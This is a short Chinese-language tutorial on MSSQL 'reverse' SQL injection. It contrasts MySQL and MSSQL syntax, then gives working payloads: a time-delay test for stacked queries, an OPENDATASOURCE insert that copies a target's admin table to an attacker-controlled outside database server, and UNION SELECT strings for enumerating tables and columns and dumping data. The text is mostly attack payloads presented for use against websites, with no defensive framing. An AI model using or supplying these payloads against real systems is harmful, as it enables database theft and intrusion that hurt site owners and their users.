MSSQL反弹注入详解

MYSQL:
1.使用‘;'来作为语句的结尾
2.使用‘\'进行转义
3.系统自带库:
mysql、information_schema、performance_schema、sys
4.查询当前数据库名称:database()
5.查看表名：tables
MSSQL:
1.‘;'是可选的，可写可不写，但是MSSQL中提供了go关键词作为批处理语句的结尾
2.在SQL Server中则不需要转义，有歧义的时候只需使用引号即可
3.系统自带库:
Master、Model、Msdb、Tempdb
4.查询当前数据库名称:db_name()
5.查看表名：sysobjects

--1.搭建MSSQL环境
/*自己搭建一个MSSQL环境是不现实的，首先你得有公网IP，有了公网IP才能将查询到的数据插入
到我们的数据库中。这里可以免费申请一个虚拟空间来帮我们搭建MSSQL环境，
比如：Alwaysdata，ProFreeHost，香港云等等。*/
--2.连接公网数据库
--使用Navicat数据库管理工具连接，连接名任意，主机为本机地址
--3.判断是否存在堆叠注入
;select name from sysobjects waitfor delay ‘00:00:05:00'//如果网站发生延迟，说明存在
--4.在连接的数据库中创建一个新表用于存放数据
--5.反弹注入
--用opendatasource函数进行反弹注入。
OPENDATASOURCE(provider_name,init_string)
/*provider_name为用于访问数据源的OLE DB 提供程序的PROGID的名称
init_string为连接地址、端口、用户名、密码、数据库名
server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称*/
--例如：
insert into opendatasource(‘sqloledb','server=den1.mssql8.gear.host,1433;uid=0;pwd=0;database=admin').admin.dbo.LYP select *from admin — qwe
/*insert into代表语句属性，是插入语句
opendatasource(‘sqloledb','server=den1.mssql8.gear.host,1433;uid=0;pwd=0;database=admin').admin.dbo.LYP表示将查询到的内容插入到什么地方
select *from admin表示要查与数据的内容
*/

'union all select  'null','null','null' --s1

'union all select id,name,'null' from sysobjects where xtype='U' --s2

'union all select 'null',name,'null' from dbo.syscolumns where id=··· ··· --s3

'union all select 字段名,字段名,字段名 from 表名 --q